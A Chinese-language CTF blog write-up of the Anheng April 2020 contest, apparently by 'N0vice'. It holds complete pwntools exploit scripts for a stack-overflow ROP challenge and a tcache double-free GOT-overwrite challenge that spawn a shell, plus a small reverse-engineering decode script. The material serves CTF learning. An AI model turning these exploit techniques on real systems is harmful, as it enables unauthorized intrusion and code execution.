<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon00.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">






  <meta name="keywords" content="CTF," />










<meta name="description" content="这次比赛很不错">
<meta property="og:type" content="article">
<meta property="og:title" content="安恒四月赛">
<meta property="og:url" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2020&#x2F;04&#x2F;26&#x2F;%E5%AE%89%E6%81%92%E5%9B%9B%E6%9C%88%E8%B5%9B&#x2F;index.html">
<meta property="og:site_name" content="N0vice&#39;s Blog">
<meta property="og:description" content="这次比赛很不错">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2020&#x2F;04&#x2F;26&#x2F;%E5%AE%89%E6%81%92%E5%9B%9B%E6%9C%88%E8%B5%9B&#x2F;1.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2020&#x2F;04&#x2F;26&#x2F;%E5%AE%89%E6%81%92%E5%9B%9B%E6%9C%88%E8%B5%9B&#x2F;2.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2020&#x2F;04&#x2F;26&#x2F;%E5%AE%89%E6%81%92%E5%9B%9B%E6%9C%88%E8%B5%9B&#x2F;3.png">
<meta property="article:published_time" content="2020-04-26T14:48:36.000Z">
<meta property="article:modified_time" content="2020-04-26T15:41:56.969Z">
<meta property="article:author" content="N0vice">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2020&#x2F;04&#x2F;26&#x2F;%E5%AE%89%E6%81%92%E5%9B%9B%E6%9C%88%E8%B5%9B&#x2F;1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/04/26/安恒四月赛/"/>





  <title>安恒四月赛 | N0vice's Blog</title>
  








<meta name="generator" content="Hexo 4.1.0"></head>
<script src="https://cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome/css/font-awesome.min.css"/>
<script src="/live2d-widget/autoload.js"></script>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">N0vice's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/04/26/%E5%AE%89%E6%81%92%E5%9B%9B%E6%9C%88%E8%B5%9B/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="N0vice">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="N0vice's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">安恒四月赛</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-04-26T22:48:36+08:00">
                2020-04-26
              </time>
            
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>这次比赛很不错<a id="more"></a>，一改以往的风格，质量比较高<br>自己做了一个pwn，问别的师傅搞出来一个pwn。据说最后那个pwn是本来打算上2.29的环境的，然后上错了上了个2.27，造成了一题两用的景象  </p>
<h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h2 id="echo-server"><a href="#echo-server" class="headerlink" title="echo server"></a>echo server</h2><p>首先就有一个坑，压缩包要解压两次，一开始看到winhex里面用test开头感觉很奇怪，不知道什么情况，把文件头删到elf为止，然后IDA打开很奇怪，后来才知道要再解压一次。。  </p>
<h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><p>漏洞函数在这里  </p>
<pre><code class="C++"><span class="function"><span class="keyword">int</span> <span class="title">sub_4006D2</span><span class="params">()</span></span>
<span class="function"></span>{
  <span class="keyword">unsigned</span> <span class="keyword">int</span> v1; <span class="comment">// [rsp+Ch] [rbp-84h]</span>
  <span class="keyword">char</span> s; <span class="comment">// [rsp+10h] [rbp-80h]</span>

  v1 = <span class="number">0</span>;
  <span class="built_in">printf</span>(<span class="string">"how long is your name: "</span>);
  __isoc99_scanf(<span class="string">"%d"</span>, &amp;v1);
  <span class="built_in">printf</span>(<span class="string">"and what's you name? "</span>);
  <span class="built_in">memset</span>(&amp;s, <span class="number">0</span>, <span class="number">0x80</span>uLL);
  sub_4006A7(&amp;s, v1);  <span class="comment">// sub_4006A7就是read，v1作为len</span>
  <span class="keyword">return</span> <span class="built_in">printf</span>(<span class="string">"hello %s"</span>, &amp;s);
}</code></pre>
<pre><code class="shell">Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)</code></pre>
<p>感觉像个ROP<br>可以输入byte，然后read，溢出<br>那岂不是很简单，随便ROP就行了<br>虽然是18的环境，但是不重要，one_gadget一把梭就行了<br>需要注意的是，system在这⑧的行，为什么呢，很可能就是ubuntu18需要栈对齐啥的，system函数里面有需要你对齐到rsp+0x10，好像加个ret就可以？<br>不知道，反正不重要了，one_gadget能打就OK  </p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><pre><code class="python"><span class="comment">#!/usr/bin/env python</span>
<span class="comment">#coding=utf-8</span>
<span class="keyword">from</span> pwn <span class="keyword">import</span>*
<span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *
<span class="keyword">import</span> sys
context.log_level = <span class="string">'debug'</span>
context.terminal = [<span class="string">'terminator'</span>,<span class="string">'-x'</span>,<span class="string">'sh'</span>,<span class="string">'-c'</span>]
binary = <span class="string">'./test'</span> 
local = <span class="number">1</span>
<span class="keyword">if</span> local == <span class="number">1</span>:
    p=process(binary)
<span class="keyword">else</span>:
    p=remote(<span class="string">""</span>,)
elf=ELF(binary)
libc=elf.libc
pop_rdi_ret = <span class="number">0x0000000000400823</span>
string = <span class="number">0x400875</span>
pop_rsi_r15 = <span class="number">0x0000000000400821</span>
<span class="function"><span class="keyword">def</span> <span class="title">exp</span><span class="params">()</span>:</span>
    p.recvuntil(<span class="string">"name: "</span>)
    p.sendline(<span class="string">"300"</span>)
    padding = <span class="string">"a"</span>*<span class="number">136</span>
    payload = padding 
    payload += p64(pop_rdi_ret) 
    payload += p64(string) 
    payload += p64(pop_rsi_r15) 
    payload += p64(elf.got[<span class="string">'__libc_start_main'</span>])  
    payload += <span class="string">"a"</span>*<span class="number">8</span> 
    payload += p64(elf.plt[<span class="string">'printf'</span>]) 
    payload += p64(<span class="number">0x4006d2</span>)
    p.send(payload)
    libc_start_main_addr = u64(p.recvuntil(<span class="string">'\x7f'</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))
    libc_base = libc_start_main_addr - libc.sym[<span class="string">'printf'</span>]
    one_gadget = libc_base + <span class="number">0x4f2c5</span>
    log.success(<span class="string">"libc_start_main_addr==&gt;"</span> + hex(libc_start_main_addr))
    log.success(<span class="string">"libc_base==&gt;"</span> + hex(libc_base))
    p.recvuntil(<span class="string">"name: "</span>)
    p.sendline(<span class="string">"300"</span>)
    padding = <span class="string">"a"</span>*<span class="number">136</span>
    payload = padding 
    payload += p64(one_gadget)
    p.recvuntil(<span class="string">"name? "</span>)
    p.send(payload)
    p.interactive()
exp()</code></pre>
<h2 id="sales-office"><a href="#sales-office" class="headerlink" title="sales_office"></a>sales_office</h2><p>glibc2.27,有tcache，没弄过，感觉要凉  </p>
<h3 id="分析-1"><a href="#分析-1" class="headerlink" title="分析"></a>分析</h3><pre><code class="shell">Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)</code></pre>
<p>got表可写<br>有以下功能  </p>
<pre><code class="shell">add
Show
free</code></pre>
<p>啊没有edit  </p>
<pre><code class="C++"><span class="function"><span class="keyword">int</span> <span class="title">buy</span><span class="params">()</span></span>
<span class="function"></span>{
  <span class="keyword">int</span> v0; <span class="comment">// ebx</span>
  <span class="keyword">void</span> **v2; <span class="comment">// rbx</span>
  <span class="keyword">signed</span> <span class="keyword">int</span> v3; <span class="comment">// [rsp+Ch] [rbp-14h]</span>

  <span class="keyword">if</span> ( num &gt; <span class="number">12</span> )
    <span class="built_in">puts</span>(<span class="string">"You have no money."</span>);
  v0 = num;
  area[v0] = <span class="built_in">malloc</span>(<span class="number">0x10</span>uLL);
  <span class="built_in">puts</span>(<span class="string">"Please input the size of your house:"</span>);
  v3 = read_int(<span class="string">"Please input the size of your house:"</span>);
  <span class="keyword">if</span> ( v3 &gt; <span class="number">96</span> )
    <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"You can't afford it."</span>);
  <span class="keyword">if</span> ( v3 &lt; <span class="number">0</span> )
    <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"?"</span>);
  *(area[num] + <span class="number">2</span>) = v3;
  v2 = area[num];
  *v2 = <span class="built_in">malloc</span>(v3);
  <span class="built_in">puts</span>(<span class="string">"please decorate your house:"</span>);
  <span class="built_in">read</span>(<span class="number">0</span>, *area[num], v3);
  <span class="built_in">puts</span>(<span class="string">"Done!"</span>);
  <span class="keyword">return</span> num++ + <span class="number">1</span>;
}</code></pre>
<p>最大申请0x60的chunk，且总chunk数不能超过12，没有溢出  </p>
<pre><code class="C++"><span class="function"><span class="keyword">int</span> <span class="title">show</span><span class="params">()</span></span>
<span class="function"></span>{
  <span class="keyword">int</span> v1; <span class="comment">// [rsp+Ch] [rbp-4h]</span>

  <span class="built_in">puts</span>(<span class="string">"index:"</span>);
  v1 = read_int(<span class="string">"index:"</span>);
  <span class="keyword">if</span> ( area[v1] )
  {
    <span class="built_in">puts</span>(<span class="string">"house:"</span>);
    <span class="built_in">puts</span>(*area[v1]);
  }
  <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"Done!"</span>);
}</code></pre>
<p>show不存在漏洞  </p>
<pre><code class="C++"><span class="function"><span class="keyword">int</span> <span class="title">sell</span><span class="params">()</span></span>
<span class="function"></span>{
  <span class="keyword">signed</span> <span class="keyword">int</span> v1; <span class="comment">// [rsp+Ch] [rbp-4h]</span>

  <span class="built_in">puts</span>(<span class="string">"index:"</span>);
  v1 = read_int(<span class="string">"index:"</span>);
  <span class="keyword">if</span> ( v1 &lt; <span class="number">0</span> || v1 &gt; <span class="number">12</span> )
    <span class="built_in">exit</span>(<span class="number">0</span>);
  <span class="keyword">if</span> ( area[v1] )
  {
    <span class="built_in">free</span>(*area[v1]);
    <span class="built_in">free</span>(area[v1]);
  }
  <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"Done!"</span>);
}</code></pre>
<p>free后未置零，存在double free(UAF)<br>但是tcache允许double free<br>然后我们只需要构造申请到一块以free_got为地址的chunk，并且content为system，就能把free_got改成system了<br>特别要注意的是，add的时候发送content要用send，不要用sendline<br>我就踩了这个坑，用了sendline，然后估计leak puts_addr的时候，把最后的”\n”也就是\xa0写进了puts_got，导致最后puts函数退出的时候，程序直接挂掉了，排错排了很久都找不到<br><img src="1.png" alt=""></p>
<h3 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h3><pre><code class="python"><span class="comment">#!/usr/bin/env python</span>
<span class="comment">#coding=utf-8</span>
<span class="keyword">from</span> pwn <span class="keyword">import</span>*
<span class="keyword">import</span> sys
context.terminal = [<span class="string">'terminator'</span>,<span class="string">'-x'</span>,<span class="string">'sh'</span>,<span class="string">'-c'</span>]
binary = <span class="string">'./sales_office'</span> 
local = <span class="number">1</span>
<span class="keyword">if</span> local == <span class="number">1</span>:
    p=process(binary)
<span class="keyword">else</span>:
    p=remote(<span class="string">"183.129.189.60"</span>,<span class="number">10008</span>)
elf=ELF(binary)
<span class="comment">#libc =ELF("libc.so")</span>
libc=ELF(<span class="string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)
<span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(size,content)</span>:</span>
    p.recvuntil(<span class="string">"choice:"</span>)
    p.sendline(<span class="string">"1"</span>)
    p.recvuntil(<span class="string">"house:\n"</span>)
    p.sendline(str(size))
    p.recvuntil(<span class="string">"house:\n"</span>)
    p.send(content)
<span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">(index)</span>:</span>
    p.recvuntil(<span class="string">"choice:"</span>)
    p.sendline(<span class="string">"3"</span>)
    p.recvuntil(<span class="string">"index:"</span>)
    p.sendline(str(index))
<span class="function"><span class="keyword">def</span> <span class="title">free</span><span class="params">(index)</span>:</span>
    p.recvuntil(<span class="string">"choice:"</span>)
    p.sendline(<span class="string">"4"</span>)
    p.recvuntil(<span class="string">"index:"</span>)
    p.sendline(str(index))

<span class="function"><span class="keyword">def</span> <span class="title">exp</span><span class="params">()</span>:</span>
    add(<span class="number">0x20</span>,<span class="string">"aaaa"</span>) <span class="comment"># 0</span>
    add(<span class="number">0x20</span>,<span class="string">"bbbb"</span>) <span class="comment"># 1</span>
    free(<span class="number">0</span>)
    free(<span class="number">1</span>)
    add(<span class="number">0x18</span>,p64(elf.got[<span class="string">'puts'</span>])) <span class="comment"># 2</span>
    show(<span class="number">0</span>)
    puts_addr = u64(p.recvuntil(<span class="string">'\x7f'</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))
    libc_base = puts_addr - libc.sym[<span class="string">'puts'</span>]
    system = libc_base + libc.sym[<span class="string">'system'</span>]
    log.success(<span class="string">"puts_addr==&gt;"</span> + hex(puts_addr))
    log.success(<span class="string">"libc_base==&gt;"</span> + hex(libc_base))
    add(<span class="number">0x18</span>,<span class="string">'fuck'</span>) <span class="comment"># 3</span>
    free(<span class="number">3</span>)
    free(<span class="number">3</span>)
    add(<span class="number">0x18</span>,p64(<span class="number">0x602018</span>)) <span class="comment"># 4</span>
    add(<span class="number">0x60</span>,<span class="string">'/bin/sh\x00'</span>) <span class="comment"># 5</span>
    add(<span class="number">0x18</span>,p64(system)) <span class="comment"># 6</span>
    free(<span class="number">5</span>)

    p.interactive()
exp()</code></pre>
<h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h2 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h2><p>别问我为什么只做了这一个，因为我看pwn去了，没有时间刚misc<br>有一个1G的文件，下载慢出天际，么得办法提速，用curl下个头就行<br><img src="2.jpg" alt=""></p>
<h1 id="REVERSE"><a href="#REVERSE" class="headerlink" title="REVERSE"></a>REVERSE</h1><p>结束后才问别的师傅搞出来的  </p>
<pre><code class="C++"><span class="keyword">int</span> __<span class="function">cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span>
<span class="function"></span>{
  <span class="keyword">size_t</span> i; <span class="comment">// [esp+28h] [ebp-80h]</span>
  <span class="keyword">char</span> v5; <span class="comment">// [esp+30h] [ebp-78h]</span>
  <span class="keyword">char</span> v6[<span class="number">8</span>]; <span class="comment">// [esp+A0h] [ebp-8h]</span>

  _alloca(<span class="number">0x10</span>u);
  __main();
  <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"input your key: "</span>);
  <span class="built_in">std</span>::<span class="keyword">operator</span>&gt;&gt;&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cin</span>, &amp;v5);
  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; <span class="built_in">strlen</span>(&amp;v5); ++i )
    v6[i - <span class="number">112</span>] = (v6[i - <span class="number">112</span>] ^ <span class="number">6</span>) + <span class="number">1</span>;
  <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(&amp;v5, <span class="string">"akhb~chdaZrdaZudqduvdZvvv|"</span>) )
    <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"yes!you are right"</span>);
  <span class="keyword">else</span>
    <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"try again"</span>);
  system(<span class="string">"PAUSE"</span>);
  <span class="keyword">return</span> <span class="number">0</span>;
}</code></pre>
<p>C艹，我裂开<br>v6[i-112]就是输入的v5<br>输入的flag经过^6+1要和akhb~chdaZrdaZudqduvdZvvv|相同<br>脚本  </p>
<pre><code class="C++"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span>
<span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdlib.h&gt;</span></span>
<span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;string.h&gt;</span></span>

<span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{
    <span class="keyword">char</span> s[] = <span class="string">"akhb~chdaZrdaZudqduvdZvvv|"</span>;
    <span class="keyword">char</span> flag[<span class="number">26</span>];
    <span class="keyword">int</span> i;
    <span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="built_in">strlen</span>(s);i++){
        flag[i] = (s[i]<span class="number">-1</span>)^<span class="number">6</span>;
    }
    <span class="built_in">puts</span>(flag);
    <span class="keyword">return</span> <span class="number">0</span>;
}</code></pre>
<p><img src="3.png" alt=""></p>
<h1 id=""><a href="#" class="headerlink" title=""></a></h1><p>剩下的没搞了，感觉re那个encrypt3可能能做一下，但是我不会写脚本啊。。<br>这次比赛还行，题目质量还可以，学到点东西<br>主要就是时间有点短，看题目的时间都不够的<br>希望下一次能8小时打底  </p>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>您的鼓励将支持我继续努力！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechat.png" alt="N0vice 微信支付"/>
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="N0vice 支付宝"/>
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    N0vice
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://yoursite.com/2020/04/26/%E5%AE%89%E6%81%92%E5%9B%9B%E6%9C%88%E8%B5%9B/" title="安恒四月赛">http://yoursite.com/2020/04/26/%E5%AE%89%E6%81%92%E5%9B%9B%E6%9C%88%E8%B5%9B/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/04/25/%E5%B8%B8%E8%A7%81fastbin-attack%E5%A5%97%E8%B7%AF%E5%AD%A6%E4%B9%A0/" rel="next" title="常见fastbin attack套路学习">
                <i class="fa fa-chevron-left"></i> 常见fastbin attack套路学习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/04/30/%E5%85%B3%E4%BA%8E%E7%9C%8B%E4%BA%86b%E7%AB%99%E8%B5%9B%E5%B0%94%E5%8F%B7%E8%A7%86%E9%A2%91%E4%B9%8B%E5%90%8E%E7%9A%84%E4%B8%80%E7%82%B9%E6%80%9D%E8%80%83/" rel="prev" title="关于看了b站赛尔号视频之后的一点思考">
                关于看了b站赛尔号视频之后的一点思考 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="N0vice" />
            
              <p class="site-author-name" itemprop="name">N0vice</p>
              <p class="site-description motion-element" itemprop="description">从前我是瞎的，如今我看得见</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">49</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/N0vice21" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.zhihu.com/people/luo-yu-piao" target="_blank" title="知乎">
                      
                        <i class="fa fa-fw fa-zhihu"></i>知乎</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://spacey.top/" title="Elli0t" target="_blank">Elli0t</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.ericdshen.com/" title="EDS" target="_blank">EDS</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://migraine-sudo.github.io" title="Migraine" target="_blank">Migraine</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://shawroot.cc/" title="Root" target="_blank">Root</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.yuque.com/pi3ntn/azmee3" title="Lime" target="_blank">Lime</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://mrbelieve128.github.io/" title="Mr.Believe" target="_blank">Mr.Believe</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://l0x1c.github.io/" title="L0x1c" target="_blank">L0x1c</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://binlep.top/" title="binlep" target="_blank">binlep</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://1p0ch.cn/" title="1p0ch" target="_blank">1p0ch</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://retr0.vip/" title="Retr_0" target="_blank">Retr_0</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.pwn4fun.com/" title="Railgun" target="_blank">Railgun</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://hackerpoet.com/" title="T4rn" target="_blank">T4rn</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.csdn.net/SopRomeo" title="penson" target="_blank">penson</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/lemon629/" title="lemon" target="_blank">lemon</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://surager.pub/" title="5ur4g3r" target="_blank">5ur4g3r</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.snowywar.top/" title="snowywar" target="_blank">snowywar</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
